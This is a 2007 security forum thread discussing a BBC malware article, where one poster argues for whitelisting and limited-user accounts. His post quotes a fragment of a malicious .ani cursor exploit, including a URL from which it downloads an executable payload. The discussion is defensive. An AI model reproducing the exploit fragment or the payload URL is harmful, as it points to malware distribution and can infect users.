BBC Malware News

Discussion in 'malware problems & news' started by Rainwalker, Apr 25, 2007.

Thread Status:
Not open for further replies.
  1. Rainwalker

    Rainwalker Registered Member

    Joined:
    May 18, 2003
    Posts:
    2,106
    Location:
    USA
  2. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    It,s very concerning.
    Edit: Removed a sentence that,s no so true!
     
    Last edited: Apr 25, 2007
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Very interesting article! A bit lame in the advice, however:

    For the Dolphins web page hack mentioned in the article -- the above advice was of no use on the first day when thousands were hit.

    sans.org added an update to their advisory:

    http://isc.sans.org/diary.html?storyid=2151
    Another example was the new *.ani exploit. The payload was triggered by the .ani file cached by means of code embedded in a web site:
    Code:
    RIFF  ACONanih$   $   ÿÿ 
    .....
    
    Å6‰D$aÃèþÿÿ  http://newasp.com.cn/xx.exe
    
    It's not surprising that the BBC article didn't mention White List protection, since Sophos deals primarily with Black List solutions -- solutions which are very effective when the companies have the signature in their database, and, assuming that the user has the updates. How many average users update daily?

    Anyone, however, with even the now-maligned-out-of-date ProcessGuard would have been protected from this.

    Less esoteric solutions would include running as Limited User.

    In both cases, the OS being yet unpatched, the .ani file would cache, but the payload would not execute.

    Tricky, clever, sophisticated attack, ultimately using same old method of infection: download/install an executable.

    While articles like this are informative, the general reader is left with a feeling of uncertainty, maybe even dread: Gee, dare I visit any website? - unless the reader investigates more deeply in to the situation and realizes that secure solutions are at hand!

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
    Last edited: Apr 25, 2007
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    U are right. They will never sugest anything more th scanners. That makes sense. They need business.
     
Loading...
Thread Status:
Not open for further replies.